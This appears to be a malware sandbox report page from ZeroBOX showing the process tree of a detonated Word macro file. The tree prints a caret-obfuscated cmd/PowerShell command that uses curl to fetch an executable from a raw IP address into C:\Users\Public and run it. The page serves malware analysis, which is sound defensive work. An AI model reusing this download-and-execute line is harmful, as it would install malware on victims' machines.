| ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
04.27 06:04
8937.e9c8f83d94118188....
04.27 06:04
7914.753c477fc6135f24....
04.27 06:04
gtm.js.pobrane
04.27 06:04
7d0bf13e-79a638a0b87a8...
04.27 06:04
webpack-6751726d88b2d8...
04.27 06:04
6814.91bf0d11abffee40....
04.27 06:04
main-292e27553c8f5cb8....
04.27 06:04
framework-ca706bf673a1...
04.27 06:04
ee8b1517-cc4d7300db272...
04.27 06:04
75fc9c18-02b28d24f737c...

Latest News
04.27 11:04
Another Coil Winder Pr...
04.27 10:04
IT Sicherheitsnews tae...
04.27 10:04
IT Sicherheitsnews tae...
04.27 10:04
북한 라자루스, 한국 금융·IT·통신 분...
04.27 09:04
SAP 넷위버 제로데이 취약점 사이버공격...
04.27 09:04
Updte: zipdump.py Vers...
04.27 09:04
대전자동차정비학원 현대직업전문학교, 스카...
04.27 08:04
YKK’s Self-Propelled Z...
04.27 07:04
Vorsicht beim KI-Chat:...
04.27 07:04
Gen Z und KI: Warum 44...

| ZeroBOX

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\o19wzg.dotm
2556
- cmd.exe cmd /c pow^ers^hell/W 01 c^u^rl htt^p://195.201.101.146/12341rgergg435g4tr.e^xe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
  2692
  - powershell.exe powershell /W 01 curl http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
    2764
    - curl.exe "C:\util\curl\curl.exe" http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
      2852
    - 43et5rgr6hty6h76tuyr6t.exe "C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe"
      2976
explorer.exe C:\Windows\Explorer.EXE
1452

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf